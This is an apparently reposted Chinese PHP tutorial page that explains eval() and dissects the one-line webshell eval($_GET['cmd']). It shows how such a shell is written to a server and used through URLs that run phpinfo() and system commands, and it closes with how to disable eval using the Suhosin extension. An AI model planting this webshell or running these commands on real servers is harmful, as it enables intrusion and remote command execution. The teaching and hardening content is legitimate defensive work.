php手册

eval函数简介与PHP一句话木马剖析

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 06, 2016 pm 07:57 PM

evalphp函數剖析簡介

eval函数简介与PHP一句话木马剖析大家好我是Carol，我的QQ是:906871417 一：eval函数 1. eval() 函数把字符串按照 PHP 代码来计算。 2. 该字符串必须是合法的 PHP 代码，且必须以分号结尾。 3. 如果没有在代码字符串中调用 return 语句，则返回 NULL 。如果

eval函数简介与PHP一句话木马剖析

大家好我是Carol，我的QQ是:906871417

一：eval函数

1.eval() 函数把字符串按照 PHP 代码来计算。

2.该字符串必须是合法的 PHP 代码，且必须以分号结尾。

3.如果没有在代码字符串中调用 return 语句，则返回 NULL。如果代码中存在解析错误，则 eval() 函数返回 false。

二：eval函数的一般用法

$string = "beautiful";

$time = "winter";

$str = 'This is a $string $time morning!';

echo $str. "
";

eval("\$str = \"$str\";");

echo $str;

输出

This is a $string $time morning!

This is a beautiful winter morning!

三：eval函数的特殊用法

eval($_GET["cmd"]);

四：php一句话挂马的原理

1.通过数据库写马：

select "" into outfile "D:\\phpStudy\\WWW\\bb.php",不过这个命令是DB和web在同一台机器的时候可以这样执行

2.通过web写马

eval($_GET["cmd"]);

访问：

http://localhost/aa.php?cmd=fwrite(fopen("aa.txt", "w"),"hello,world!");

eval函数简介与PHP一句话木马剖析

查看php的shell信息：

http://localhost/aa.php?cmd=phpinfo();

eval函数简介与PHP一句话木马剖析

查看当前运行的服务

http://localhost/aa.php?cmd=system("net start");

eval函数简介与PHP一句话木马剖析

五：禁用eval函数

无论是linux服务器还是windows服务器,eval命令是非常危险的

如何禁用eval命令

在php.ini中这样设置disable_functions =eval是无法禁用eval的，根据php手册说明，eval是一个语言构造器而不是一个函数。如果要禁用eval，则需要第三方扩展，使用Suhosin

linux下安装：

php的安装就不写了

suhosin的安装

wget http://download.suhosin.org/suhosin-0.9.23.tgz

tar zxvfsuhosin-0.9.23.tgz

cd suhosin-0.9.23

/usr/local/php/bin/phpize //这一步不能省

./configure --with-php-config=/usr/local/php/bin/php-config //必须在这儿注明php-config所在的绝对路径。

make

make install

Installing shared extensions: /usr/local/php/lib/php/extensions/no-debug-non-zts-20060613/

然后在php.ini中增加一行下列语句。

extension=suhosin.so

suhosin.executor.disable_eval = on

参考文档: http://ju.outofmemory.cn/entry/29300

陳述

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

提高 Python 代码可读性的五个基本技巧Apr 12, 2023 pm 08:58 PM

Python 中有许多方法可以帮助我们理解代码的内部工作原理，良好的编程习惯，可以使我们的工作事半功倍！例如，我们最终可能会得到看起来很像下图中的代码。虽然不是最糟糕的，但是，我们需要扩展一些事情，例如：load_las_file 函数中的 f 和 d 代表什么？为什么我们要在 clay 函数中检查结果？这些函数需要什么类型？Floats? DataFrames?在本文中，我们将着重讨论如何通过文档、提示输入和正确的变量名称来提高应用程序/脚本的可读性的五个基本技巧。1. Comments我们可

python中eval是什么意思？May 22, 2019 pm 03:18 PM

eval的意思是“评估”，是python中的一个内置函数，用于执行一个字符串表达式，并返回表达式的计算结果；即变量赋值时，等号右边的表示是写成字符串的格式，返回值就是这个表达式的结果。语法“eval(表达式[, globals[, locals]])”。

CRPS：贝叶斯机器学习模型的评分函数Apr 12, 2023 am 11:07 AM

连续分级概率评分（Continuous Ranked Probability Score, CRPS）或“连续概率排位分数”是一个函数或统计量，可以将分布预测与真实值进行比较。机器学习工作流程的一个重要部分是模型评估。这个过程本身可以被认为是常识：将数据分成训练集和测试集，在训练集上训练模型，并使用评分函数评估其在测试集上的性能。评分函数（或度量）是将真实值及其预测映射到一个单一且可比较的值 [1]。例如，对于连续预测可以使用 RMSE、MAE、MAPE 或 R 平方等评分函数。如果预测不是逐点

详解JavaScript函数如何实现可变参数？（总结分享）Aug 04, 2022 pm 02:35 PM

js是弱类型语言，不能像C#那样使用param关键字来声明形参是一个可变参数。那么js中，如何实现这种可变参数呢？下面本篇文章就来聊聊JavaScript函数可变参数的实现方法，希望对大家有所帮助！

盘点Python内置函数sorted()高级用法实战May 13, 2023 am 10:34 AM

一、前言前几天在Python钻石交流群有个叫【emerson】的粉丝问了一个Python排序的问题，这里拿出来给大家分享下，一起学习下。其实这里【瑜亮老师】、【布达佩斯的永恒】等人讲了很多，只不过对于基础不太好的小伙伴们来说，还是有点难的。不过在实际应用中内置函数sorted()用的还是蛮多的，这里也单独拿出来讲一下，希望下次再有小伙伴遇到的时候，可以不慌。二、基础用法内置函数sorted()可以用来做排序，基础的用法很简单，看个例子，如下所示。lst=[3,28,18,29,2,5,88

win下php怎么禁止evalOct 31, 2022 am 09:33 AM

win下php禁止eval的方法：1、下载“PHP_diseval_extension”；2、找到服务器当前使用的PHP；3、打开PHP配置文件；4、添加“extension=diseval.so”代码；5、重启服务即可。

学Python，还不知道main函数吗Apr 12, 2023 pm 02:58 PM

Python 中的 main 函数充当程序的执行点，在 Python 编程中定义 main 函数是启动程序执行的必要条件，不过它仅在程序直接运行时才执行，而在作为模块导入时不会执行。要了解有关 Python main 函数的更多信息，我们将从如下几点逐步学习：什么是 Python 函数Python 中 main 函数的功能是什么一个基本的 Python main() 是怎样的Python 执行模式Let’s get started什么是 Python 函数相信很多小伙伴对函数都不陌生了，函数是可

Python面向对象里常见的内置成员介绍Apr 12, 2023 am 09:10 AM

好嘞，今天我们继续剖析下Python里的类。[[441842]]先前我们定义类的时候，使用到了构造函数，在Python里的构造函数书写比较特殊，他是一个特殊的函数__init__，其实在类里，除了构造函数还有很多其他格式为__XXX__的函数，另外也有一些__xx__的属性。下面我们一一说下:构造函数Python里所有类的构造函数都是__init__,其中根据我们的需求，构造函数又分为有参构造函数和无惨构造函数。如果当前没有定义构造函数，那么系统会自动生成一个无参空的构造函数。例如:在有继承关系

See all articles